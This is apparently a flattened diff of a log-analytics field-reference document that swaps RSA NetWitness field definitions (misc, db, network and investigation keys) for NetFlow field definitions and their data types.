-type: keyword +type: integer -- -*`rsa.misc.cn_sampint`*:: +*`netflow.port_range_num_ports`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cn_seqctr`*:: +*`netflow.port_range_start`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cn_spackets`*:: +*`netflow.port_range_step_size`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cn_src_tos`*:: +*`netflow.post_destination_mac_address`*:: + -- type: keyword -- -*`rsa.misc.cn_src_vlan`*:: +*`netflow.post_dot1q_customer_vlan_id`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cn_sysuptime`*:: +*`netflow.post_dot1q_vlan_id`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cn_template_id`*:: +*`netflow.post_ip_class_of_service`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_totbytsexp`*:: +*`netflow.post_ip_diff_serv_code_point`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_totflowexp`*:: +*`netflow.post_ip_precedence`*:: + -- -type: keyword +type: short -- -*`rsa.misc.cn_totpcktsexp`*:: +*`netflow.post_layer2_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_unixnanosecs`*:: +*`netflow.post_layer2_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_v6flowlabel`*:: +*`netflow.post_mcast_layer2_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cn_v6optheaders`*:: +*`netflow.post_mcast_layer2_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.comp_class`*:: +*`netflow.post_mcast_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.comp_name`*:: +*`netflow.post_mcast_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.comp_rbytes`*:: +*`netflow.post_mcast_packet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.comp_sbytes`*:: +*`netflow.post_mcast_packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cpu_data`*:: +*`netflow.post_mpls_top_label_exp`*:: + -- -type: keyword +type: short -- -*`rsa.misc.criticality`*:: +*`netflow.post_napt_destination_transport_port`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_agency_dst`*:: +*`netflow.post_napt_source_transport_port`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_analyzedby`*:: +*`netflow.post_nat_destination_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cs_av_other`*:: +*`netflow.post_nat_destination_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cs_av_primary`*:: +*`netflow.post_nat_source_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cs_av_secondary`*:: +*`netflow.post_nat_source_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cs_bgpv6nxthop`*:: +*`netflow.post_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_bit9status`*:: +*`netflow.post_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_context`*:: +*`netflow.post_packet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_control`*:: +*`netflow.post_packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_data`*:: +*`netflow.post_source_mac_address`*:: + -- type: keyword -- -*`rsa.misc.cs_datecret`*:: +*`netflow.post_vlan_id`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_dst_tld`*:: +*`netflow.private_enterprise_number`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_eth_dst_ven`*:: +*`netflow.procera_apn`*:: + -- type: keyword -- -*`rsa.misc.cs_eth_src_ven`*:: +*`netflow.procera_base_service`*:: + -- type: keyword -- -*`rsa.misc.cs_event_uuid`*:: +*`netflow.procera_content_categories`*:: + -- type: keyword -- -*`rsa.misc.cs_filetype`*:: +*`netflow.procera_device_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_fld`*:: +*`netflow.procera_external_rtt`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_if_desc`*:: +*`netflow.procera_flow_behavior`*:: + -- type: keyword -- -*`rsa.misc.cs_if_name`*:: +*`netflow.procera_ggsn`*:: + -- type: keyword -- -*`rsa.misc.cs_ip_next_hop`*:: +*`netflow.procera_http_content_type`*:: + -- type: keyword -- -*`rsa.misc.cs_ipv4dstpre`*:: +*`netflow.procera_http_file_length`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_ipv4srcpre`*:: +*`netflow.procera_http_language`*:: + -- type: keyword -- -*`rsa.misc.cs_lifetime`*:: +*`netflow.procera_http_location`*:: + -- type: keyword -- -*`rsa.misc.cs_log_medium`*:: +*`netflow.procera_http_referer`*:: + -- type: keyword -- -*`rsa.misc.cs_loginname`*:: +*`netflow.procera_http_request_method`*:: + -- type: keyword -- -*`rsa.misc.cs_modulescore`*:: +*`netflow.procera_http_request_version`*:: + -- type: keyword -- -*`rsa.misc.cs_modulesign`*:: +*`netflow.procera_http_response_status`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_opswatresult`*:: +*`netflow.procera_http_url`*:: + -- type: keyword -- -*`rsa.misc.cs_payload`*:: +*`netflow.procera_http_user_agent`*:: + -- type: keyword -- -*`rsa.misc.cs_registrant`*:: +*`netflow.procera_imsi`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_registrar`*:: +*`netflow.procera_incoming_octets`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_represult`*:: +*`netflow.procera_incoming_packets`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_rpayload`*:: +*`netflow.procera_incoming_shaping_drops`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_sampler_name`*:: +*`netflow.procera_incoming_shaping_latency`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_sourcemodule`*:: +*`netflow.procera_internal_rtt`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.cs_streams`*:: +*`netflow.procera_local_ipv4_host`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cs_targetmodule`*:: +*`netflow.procera_local_ipv6_host`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.cs_v6nxthop`*:: +*`netflow.procera_msisdn`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_whois_server`*:: +*`netflow.procera_outgoing_octets`*:: + -- -type: keyword +type: long -- -*`rsa.misc.cs_yararesult`*:: +*`netflow.procera_outgoing_packets`*:: + -- -type: keyword +type: long -- -*`rsa.misc.description`*:: +*`netflow.procera_outgoing_shaping_drops`*:: + -- -type: keyword +type: long -- -*`rsa.misc.devvendor`*:: +*`netflow.procera_outgoing_shaping_latency`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.distance`*:: +*`netflow.procera_property`*:: + -- type: keyword -- -*`rsa.misc.dstburb`*:: +*`netflow.procera_qoe_incoming_external`*:: + -- -type: keyword +type: float -- -*`rsa.misc.edomain`*:: +*`netflow.procera_qoe_incoming_internal`*:: + -- -type: keyword +type: float -- -*`rsa.misc.edomaub`*:: +*`netflow.procera_qoe_outgoing_external`*:: + -- -type: keyword +type: float -- -*`rsa.misc.euid`*:: +*`netflow.procera_qoe_outgoing_internal`*:: + -- -type: keyword +type: float -- -*`rsa.misc.facility`*:: +*`netflow.procera_rat`*:: + -- type: keyword -- -*`rsa.misc.finterface`*:: +*`netflow.procera_remote_ipv4_host`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.flags`*:: +*`netflow.procera_remote_ipv6_host`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.gaddr`*:: +*`netflow.procera_rnc`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.id3`*:: +*`netflow.procera_server_hostname`*:: + -- type: keyword -- -*`rsa.misc.im_buddyname`*:: +*`netflow.procera_service`*:: + -- type: keyword -- -*`rsa.misc.im_croomid`*:: +*`netflow.procera_sgsn`*:: + -- type: keyword -- -*`rsa.misc.im_croomtype`*:: +*`netflow.procera_subscriber_identifier`*:: + -- type: keyword -- -*`rsa.misc.im_members`*:: +*`netflow.procera_template_name`*:: + -- type: keyword -- -*`rsa.misc.im_username`*:: +*`netflow.procera_user_location_information`*:: + -- type: keyword -- -*`rsa.misc.ipkt`*:: +*`netflow.protocol_identifier`*:: + -- -type: keyword +type: short -- -*`rsa.misc.ipscat`*:: +*`netflow.pseudo_wire_control_word`*:: + -- -type: keyword +type: long -- -*`rsa.misc.ipspri`*:: +*`netflow.pseudo_wire_destination_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.latitude`*:: +*`netflow.pseudo_wire_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.linenum`*:: +*`netflow.pseudo_wire_type`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.list_name`*:: +*`netflow.reason`*:: + -- -type: keyword +type: long -- -*`rsa.misc.load_data`*:: +*`netflow.reason_text`*:: + -- type: keyword -- -*`rsa.misc.location_floor`*:: +*`netflow.relative_error`*:: + -- -type: keyword +type: double -- -*`rsa.misc.location_mark`*:: +*`netflow.responder_octets`*:: + -- -type: keyword +type: long -- -*`rsa.misc.log_id`*:: +*`netflow.responder_packets`*:: + -- -type: keyword +type: long -- -*`rsa.misc.log_type`*:: +*`netflow.reverse_absolute_error`*:: + -- -type: keyword +type: double -- -*`rsa.misc.logid`*:: +*`netflow.reverse_anonymization_flags`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.logip`*:: +*`netflow.reverse_anonymization_technique`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.logname`*:: +*`netflow.reverse_application_category_name`*:: + -- type: keyword -- -*`rsa.misc.longitude`*:: +*`netflow.reverse_application_description`*:: + -- type: keyword -- -*`rsa.misc.lport`*:: +*`netflow.reverse_application_group_name`*:: + -- type: keyword -- -*`rsa.misc.mbug_data`*:: +*`netflow.reverse_application_id`*:: + -- type: keyword -- -*`rsa.misc.misc_name`*:: +*`netflow.reverse_application_name`*:: + -- type: keyword -- -*`rsa.misc.msg_type`*:: +*`netflow.reverse_application_sub_category_name`*:: + -- type: keyword -- -*`rsa.misc.msgid`*:: +*`netflow.reverse_average_interarrival_time`*:: + -- -type: keyword +type: long -- -*`rsa.misc.netsessid`*:: +*`netflow.reverse_bgp_destination_as_number`*:: + -- -type: keyword +type: long -- -*`rsa.misc.num`*:: +*`netflow.reverse_bgp_next_adjacent_as_number`*:: + -- -type: keyword +type: long -- -*`rsa.misc.number1`*:: +*`netflow.reverse_bgp_next_hop_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.number2`*:: +*`netflow.reverse_bgp_next_hop_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.nwwn`*:: +*`netflow.reverse_bgp_prev_adjacent_as_number`*:: + -- -type: keyword +type: long -- -*`rsa.misc.object`*:: +*`netflow.reverse_bgp_source_as_number`*:: + -- -type: keyword +type: long -- -*`rsa.misc.operation`*:: +*`netflow.reverse_bgp_validity_state`*:: + -- -type: keyword +type: short -- -*`rsa.misc.opkt`*:: +*`netflow.reverse_class_id`*:: + -- -type: keyword +type: short -- -*`rsa.misc.orig_from`*:: +*`netflow.reverse_class_name`*:: + -- type: keyword -- -*`rsa.misc.owner_id`*:: +*`netflow.reverse_classification_engine_id`*:: + -- -type: keyword +type: short -- -*`rsa.misc.p_action`*:: +*`netflow.reverse_collection_time_milliseconds`*:: + -- -type: keyword +type: long -- -*`rsa.misc.p_filter`*:: +*`netflow.reverse_collector_certificate`*:: + -- type: keyword -- -*`rsa.misc.p_group_object`*:: +*`netflow.reverse_confidence_level`*:: + -- -type: keyword +type: double -- -*`rsa.misc.p_id`*:: +*`netflow.reverse_connection_sum_duration_seconds`*:: + -- -type: keyword +type: long -- -*`rsa.misc.p_msgid1`*:: +*`netflow.reverse_connection_transaction_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.p_msgid2`*:: +*`netflow.reverse_data_byte_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.p_result1`*:: +*`netflow.reverse_data_link_frame_section`*:: + -- type: keyword -- -*`rsa.misc.password_chg`*:: +*`netflow.reverse_data_link_frame_size`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.password_expire`*:: +*`netflow.reverse_data_link_frame_type`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.permgranted`*:: +*`netflow.reverse_data_records_reliability`*:: + -- -type: keyword +type: short -- -*`rsa.misc.permwanted`*:: +*`netflow.reverse_delta_flow_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.pgid`*:: +*`netflow.reverse_destination_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.policyUUID`*:: +*`netflow.reverse_destination_ipv4_prefix`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.prog_asp_num`*:: +*`netflow.reverse_destination_ipv4_prefix_length`*:: + -- -type: keyword +type: short -- -*`rsa.misc.program`*:: +*`netflow.reverse_destination_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.real_data`*:: +*`netflow.reverse_destination_ipv6_prefix`*:: + -- -type: keyword +type: ip -- -*`rsa.misc.rec_asp_device`*:: +*`netflow.reverse_destination_ipv6_prefix_length`*:: + -- -type: keyword +type: short -- -*`rsa.misc.rec_asp_num`*:: +*`netflow.reverse_destination_mac_address`*:: + -- type: keyword -- -*`rsa.misc.rec_library`*:: +*`netflow.reverse_destination_transport_port`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.recordnum`*:: +*`netflow.reverse_digest_hash_value`*:: + -- -type: keyword +type: long -- -*`rsa.misc.ruid`*:: +*`netflow.reverse_distinct_count_of_destination_ip_address`*:: + -- -type: keyword +type: long -- -*`rsa.misc.sburb`*:: +*`netflow.reverse_distinct_count_of_destination_ipv4_address`*:: + -- -type: keyword +type: long -- -*`rsa.misc.sdomain_fld`*:: +*`netflow.reverse_distinct_count_of_destination_ipv6_address`*:: + -- -type: keyword +type: long -- -*`rsa.misc.sec`*:: +*`netflow.reverse_distinct_count_of_source_ip_address`*:: + -- -type: keyword +type: long -- -*`rsa.misc.sensorname`*:: +*`netflow.reverse_distinct_count_of_source_ipv4_address`*:: + -- -type: keyword +type: long -- -*`rsa.misc.seqnum`*:: +*`netflow.reverse_distinct_count_of_source_ipv6_address`*:: + -- -type: keyword +type: long -- -*`rsa.misc.session`*:: +*`netflow.reverse_dot1q_customer_dei`*:: + -- -type: keyword +type: short -- -*`rsa.misc.sessiontype`*:: +*`netflow.reverse_dot1q_customer_destination_mac_address`*:: + -- type: keyword -- -*`rsa.misc.sigUUID`*:: +*`netflow.reverse_dot1q_customer_priority`*:: + -- -type: keyword +type: short -- -*`rsa.misc.spi`*:: +*`netflow.reverse_dot1q_customer_source_mac_address`*:: + -- type: keyword -- -*`rsa.misc.srcburb`*:: +*`netflow.reverse_dot1q_customer_vlan_id`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.srcdom`*:: +*`netflow.reverse_dot1q_dei`*:: + -- -type: keyword +type: short -- -*`rsa.misc.srcservice`*:: +*`netflow.reverse_dot1q_priority`*:: + -- -type: keyword +type: short -- -*`rsa.misc.state`*:: +*`netflow.reverse_dot1q_service_instance_id`*:: + -- -type: keyword +type: long -- -*`rsa.misc.status1`*:: +*`netflow.reverse_dot1q_service_instance_priority`*:: + -- -type: keyword +type: short -- -*`rsa.misc.svcno`*:: +*`netflow.reverse_dot1q_service_instance_tag`*:: + -- type: keyword -- -*`rsa.misc.system`*:: +*`netflow.reverse_dot1q_vlan_id`*:: + -- -type: keyword +type: integer -- -*`rsa.misc.tbdstr1`*:: +*`netflow.reverse_dropped_layer2_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.tgtdom`*:: +*`netflow.reverse_dropped_layer2_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.tgtdomain`*:: +*`netflow.reverse_dropped_octet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.threshold`*:: +*`netflow.reverse_dropped_octet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.type1`*:: +*`netflow.reverse_dropped_packet_delta_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.udb_class`*:: +*`netflow.reverse_dropped_packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.url_fld`*:: +*`netflow.reverse_dst_traffic_index`*:: + -- -type: keyword +type: long -- -*`rsa.misc.user_div`*:: +*`netflow.reverse_egress_broadcast_packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.userid`*:: +*`netflow.reverse_egress_interface`*:: + -- -type: keyword +type: long -- -*`rsa.misc.username_fld`*:: +*`netflow.reverse_egress_interface_type`*:: + -- -type: keyword +type: long -- -*`rsa.misc.utcstamp`*:: +*`netflow.reverse_egress_physical_interface`*:: + -- -type: keyword +type: long -- -*`rsa.misc.v_instafname`*:: +*`netflow.reverse_egress_unicast_packet_total_count`*:: + -- -type: keyword +type: long -- -*`rsa.misc.virt_data`*:: +*`netflow.reverse_egress_vrfid`*:: + -- -type: keyword +type: long -- -*`rsa.misc.vpnid`*:: +*`netflow.reverse_encrypted_technology`*:: + -- type: keyword -- -*`rsa.misc.autorun_type`*:: +*`netflow.reverse_engine_id`*:: + -- -This is used to capture Auto Run type - -type: keyword +type: short -- -*`rsa.misc.cc_number`*:: +*`netflow.reverse_engine_type`*:: + -- -Valid Credit Card Numbers only - -type: long +type: short -- -*`rsa.misc.content`*:: +*`netflow.reverse_ethernet_header_length`*:: + -- -This key captures the content type from protocol headers - -type: keyword +type: short -- -*`rsa.misc.ein_number`*:: +*`netflow.reverse_ethernet_payload_length`*:: + -- -Employee Identification Numbers only - -type: long +type: integer -- -*`rsa.misc.found`*:: +*`netflow.reverse_ethernet_total_length`*:: + -- -This is used to capture the results of regex match - -type: keyword +type: integer -- -*`rsa.misc.language`*:: +*`netflow.reverse_ethernet_type`*:: + -- -This is used to capture list of languages the client support and what it prefers - -type: keyword +type: integer -- -*`rsa.misc.lifetime`*:: +*`netflow.reverse_export_sctp_stream_id`*:: + -- -This key is used to capture the session lifetime in seconds. - -type: long +type: integer -- -*`rsa.misc.link`*:: +*`netflow.reverse_exporter_certificate`*:: + -- -This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.misc.match`*:: +*`netflow.reverse_exporting_process_id`*:: + -- -This key is for regex match name from search.ini - -type: keyword +type: long -- -*`rsa.misc.param_dst`*:: +*`netflow.reverse_firewall_event`*:: + -- -This key captures the command line/launch argument of the target process or file - -type: keyword +type: short -- -*`rsa.misc.param_src`*:: +*`netflow.reverse_first_non_empty_packet_size`*:: + -- -This key captures source parameter - -type: keyword +type: integer -- -*`rsa.misc.search_text`*:: +*`netflow.reverse_first_packet_banner`*:: + -- -This key captures the Search Text used - type: keyword -- -*`rsa.misc.sig_name`*:: +*`netflow.reverse_flags_and_sampler_id`*:: + -- -This key is used to capture the Signature Name only. - -type: keyword +type: long -- -*`rsa.misc.snmp_value`*:: +*`netflow.reverse_flow_active_timeout`*:: + -- -SNMP set request value - -type: keyword +type: integer -- -*`rsa.misc.streams`*:: +*`netflow.reverse_flow_attributes`*:: + -- -This key captures number of streams in session - -type: long +type: integer -- - -*`rsa.db.index`*:: +*`netflow.reverse_flow_delta_milliseconds`*:: + -- -This key captures IndexID of the index. - -type: keyword +type: long -- -*`rsa.db.instance`*:: +*`netflow.reverse_flow_direction`*:: + -- -This key is used to capture the database server instance name - -type: keyword +type: short -- -*`rsa.db.database`*:: +*`netflow.reverse_flow_duration_microseconds`*:: + -- -This key is used to capture the name of a database or an instance as seen in a session - -type: keyword +type: long -- -*`rsa.db.transact_id`*:: +*`netflow.reverse_flow_duration_milliseconds`*:: + -- -This key captures the SQL transantion ID of the current session - -type: keyword +type: long -- -*`rsa.db.permissions`*:: +*`netflow.reverse_flow_end_delta_microseconds`*:: + -- -This key captures permission or privilege level assigned to a resource. - -type: keyword +type: long -- -*`rsa.db.table_name`*:: +*`netflow.reverse_flow_end_microseconds`*:: + -- -This key is used to capture the table name - -type: keyword +type: long -- -*`rsa.db.db_id`*:: +*`netflow.reverse_flow_end_milliseconds`*:: + -- -This key is used to capture the unique identifier for a database - -type: keyword +type: long -- -*`rsa.db.db_pid`*:: +*`netflow.reverse_flow_end_nanoseconds`*:: + -- -This key captures the process id of a connection with database server - type: long -- -*`rsa.db.lread`*:: +*`netflow.reverse_flow_end_reason`*:: + -- -This key is used for the number of logical reads - -type: long +type: short -- -*`rsa.db.lwrite`*:: +*`netflow.reverse_flow_end_seconds`*:: + -- -This key is used for the number of logical writes - type: long -- -*`rsa.db.pread`*:: +*`netflow.reverse_flow_end_sys_up_time`*:: + -- -This key is used for the number of physical writes - type: long -- - -*`rsa.network.alias_host`*:: +*`netflow.reverse_flow_idle_timeout`*:: + -- -This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. - -type: keyword +type: integer -- -*`rsa.network.domain`*:: +*`netflow.reverse_flow_label_ipv6`*:: + -- -type: keyword +type: long -- -*`rsa.network.host_dst`*:: +*`netflow.reverse_flow_sampling_time_interval`*:: + -- -This key should only be used when it’s a Destination Hostname - -type: keyword +type: long -- -*`rsa.network.network_service`*:: +*`netflow.reverse_flow_sampling_time_spacing`*:: + -- -This is used to capture layer 7 protocols/service names - -type: keyword +type: long -- -*`rsa.network.interface`*:: +*`netflow.reverse_flow_selected_flow_delta_count`*:: + -- -This key should be used when the source or destination context of an interface is not clear - -type: keyword +type: long -- -*`rsa.network.network_port`*:: +*`netflow.reverse_flow_selected_octet_delta_count`*:: + -- -Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) - type: long -- -*`rsa.network.eth_host`*:: +*`netflow.reverse_flow_selected_packet_delta_count`*:: + -- -Deprecated, use alias.mac - -type: keyword +type: long -- -*`rsa.network.sinterface`*:: +*`netflow.reverse_flow_selector_algorithm`*:: + -- -This key should only be used when it’s a Source Interface - -type: keyword +type: integer -- -*`rsa.network.dinterface`*:: +*`netflow.reverse_flow_start_delta_microseconds`*:: + -- -This key should only be used when it’s a Destination Interface - -type: keyword +type: long -- -*`rsa.network.vlan`*:: +*`netflow.reverse_flow_start_microseconds`*:: + -- -This key should only be used to capture the ID of the Virtual LAN - type: long -- -*`rsa.network.zone_src`*:: +*`netflow.reverse_flow_start_milliseconds`*:: + -- -This key should only be used when it’s a Source Zone. - -type: keyword +type: long -- -*`rsa.network.zone`*:: +*`netflow.reverse_flow_start_nanoseconds`*:: + -- -This key should be used when the source or destination context of a Zone is not clear - -type: keyword +type: long -- -*`rsa.network.zone_dst`*:: +*`netflow.reverse_flow_start_seconds`*:: + -- -This key should only be used when it’s a Destination Zone. - -type: keyword +type: long -- -*`rsa.network.gateway`*:: +*`netflow.reverse_flow_start_sys_up_time`*:: + -- -This key is used to capture the IP Address of the gateway - -type: keyword +type: long -- -*`rsa.network.icmp_type`*:: +*`netflow.reverse_forwarding_status`*:: + -- -This key is used to capture the ICMP type only - type: long -- -*`rsa.network.mask`*:: +*`netflow.reverse_fragment_flags`*:: + -- -This key is used to capture the device network IPmask. - -type: keyword +type: short -- -*`rsa.network.icmp_code`*:: +*`netflow.reverse_fragment_identification`*:: + -- -This key is used to capture the ICMP code only - type: long -- -*`rsa.network.protocol_detail`*:: +*`netflow.reverse_fragment_offset`*:: + -- -This key should be used to capture additional protocol information - -type: keyword +type: integer -- -*`rsa.network.dmask`*:: +*`netflow.reverse_gre_key`*:: + -- -This key is used for Destionation Device network mask - -type: keyword +type: long -- -*`rsa.network.port`*:: +*`netflow.reverse_hash_digest_output`*:: + -- -This key should only be used to capture a Network Port when the directionality is not clear - -type: long +type: short -- -*`rsa.network.smask`*:: +*`netflow.reverse_hash_flow_domain`*:: + -- -This key is used for capturing source Network Mask - -type: keyword +type: integer -- -*`rsa.network.netname`*:: +*`netflow.reverse_hash_initialiser_value`*:: + -- -This key is used to capture the network name associated with an IP range. This is configured by the end user. - -type: keyword +type: long -- -*`rsa.network.paddr`*:: +*`netflow.reverse_hash_ip_payload_offset`*:: + -- -Deprecated - -type: ip +type: long -- -*`rsa.network.faddr`*:: +*`netflow.reverse_hash_ip_payload_size`*:: + -- -type: keyword +type: long -- -*`rsa.network.lhost`*:: +*`netflow.reverse_hash_output_range_max`*:: + -- -type: keyword +type: long -- -*`rsa.network.origin`*:: +*`netflow.reverse_hash_output_range_min`*:: + -- -type: keyword +type: long -- -*`rsa.network.remote_domain_id`*:: +*`netflow.reverse_hash_selected_range_max`*:: + -- -type: keyword +type: long -- -*`rsa.network.addr`*:: +*`netflow.reverse_hash_selected_range_min`*:: + -- -type: keyword +type: long -- -*`rsa.network.dns_a_record`*:: +*`netflow.reverse_icmp_code_ipv4`*:: + -- -type: keyword +type: short -- -*`rsa.network.dns_ptr_record`*:: +*`netflow.reverse_icmp_code_ipv6`*:: + -- -type: keyword +type: short -- -*`rsa.network.fhost`*:: +*`netflow.reverse_icmp_type_code_ipv4`*:: + -- -type: keyword +type: integer -- -*`rsa.network.fport`*:: +*`netflow.reverse_icmp_type_code_ipv6`*:: + -- -type: keyword +type: integer -- -*`rsa.network.laddr`*:: +*`netflow.reverse_icmp_type_ipv4`*:: + -- -type: keyword +type: short -- -*`rsa.network.linterface`*:: +*`netflow.reverse_icmp_type_ipv6`*:: + -- -type: keyword +type: short -- -*`rsa.network.phost`*:: +*`netflow.reverse_igmp_type`*:: + -- -type: keyword +type: short -- -*`rsa.network.ad_computer_dst`*:: +*`netflow.reverse_ignored_data_record_total_count`*:: + -- -Deprecated, use host.dst - -type: keyword +type: long -- -*`rsa.network.eth_type`*:: +*`netflow.reverse_ignored_layer2_frame_total_count`*:: + -- -This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only - type: long -- -*`rsa.network.ip_proto`*:: +*`netflow.reverse_ignored_layer2_octet_total_count`*:: + -- -This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI - type: long -- -*`rsa.network.dns_cname_record`*:: +*`netflow.reverse_information_element_data_type`*:: + -- -type: keyword +type: short -- -*`rsa.network.dns_id`*:: +*`netflow.reverse_information_element_description`*:: + -- type: keyword -- -*`rsa.network.dns_opcode`*:: +*`netflow.reverse_information_element_id`*:: + -- -type: keyword +type: integer -- -*`rsa.network.dns_resp`*:: +*`netflow.reverse_information_element_index`*:: + -- -type: keyword +type: integer -- -*`rsa.network.dns_type`*:: +*`netflow.reverse_information_element_name`*:: + -- type: keyword -- -*`rsa.network.domain1`*:: +*`netflow.reverse_information_element_range_begin`*:: + -- -type: keyword +type: long -- -*`rsa.network.host_type`*:: +*`netflow.reverse_information_element_range_end`*:: + -- -type: keyword +type: long -- -*`rsa.network.packet_length`*:: +*`netflow.reverse_information_element_semantics`*:: + -- -type: keyword +type: short -- -*`rsa.network.host_orig`*:: +*`netflow.reverse_information_element_units`*:: + -- -This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. - -type: keyword +type: integer -- -*`rsa.network.rpayload`*:: +*`netflow.reverse_ingress_broadcast_packet_total_count`*:: + -- -This key is used to capture the total number of payload bytes seen in the retransmitted packets. - -type: keyword +type: long -- -*`rsa.network.vlan_name`*:: +*`netflow.reverse_ingress_interface`*:: + -- -This key should only be used to capture the name of the Virtual LAN - -type: keyword +type: long -- - -*`rsa.investigations.ec_activity`*:: +*`netflow.reverse_ingress_interface_type`*:: + -- -This key captures the particular event activity(Ex:Logoff) - -type: keyword +type: long -- -*`rsa.investigations.ec_theme`*:: +*`netflow.reverse_ingress_multicast_packet_total_count`*:: + -- -This key captures the Theme of a particular Event(Ex:Authentication) - -type: keyword +type: long -- -*`rsa.investigations.ec_subject`*:: +*`netflow.reverse_ingress_physical_interface`*:: + -- -This key captures the Subject of a particular Event(Ex:User) - -type: keyword +type: long -- -*`rsa.investigations.ec_outcome`*:: +*`netflow.reverse_ingress_unicast_packet_total_count`*:: + -- -This key captures the outcome of a particular Event(Ex:Success) - -type: keyword +type: long -- -*`rsa.investigations.event_cat`*:: +*`netflow.reverse_ingress_vrfid`*:: + -- -This key captures the Event category number - type: long -- -*`rsa.investigations.event_cat_name`*:: +*`netflow.reverse_initial_tcp_flags`*:: + -- -This key captures the event category name corresponding to the event cat code - -type: keyword +type: short -- -*`rsa.investigations.event_vcat`*:: +*`netflow.reverse_initiator_octets`*:: + -- -This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. - -type: keyword +type: long -- -*`rsa.investigations.analysis_file`*:: +*`netflow.reverse_initiator_packets`*:: + -- -This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file - -type: keyword +type: long -- -*`rsa.investigations.analysis_service`*:: +*`netflow.reverse_interface_description`*:: + -- -This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service - type: keyword -- -*`rsa.investigations.analysis_session`*:: +*`netflow.reverse_interface_name`*:: + -- -This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session - type: keyword -- -*`rsa.investigations.boc`*:: +*`netflow.reverse_intermediate_process_id`*:: + -- -This is used to capture behaviour of compromise - -type: keyword +type: long -- -*`rsa.investigations.eoc`*:: +*`netflow.reverse_ip_class_of_service`*:: + -- -This is used to capture Enablers of Compromise - -type: keyword +type: short -- -*`rsa.investigations.inv_category`*:: +*`netflow.reverse_ip_diff_serv_code_point`*:: + -- -This used to capture investigation category - -type: keyword +type: short -- -*`rsa.investigations.inv_context`*:: +*`netflow.reverse_ip_header_length`*:: + -- -This used to capture investigation context - -type: keyword +type: short -- 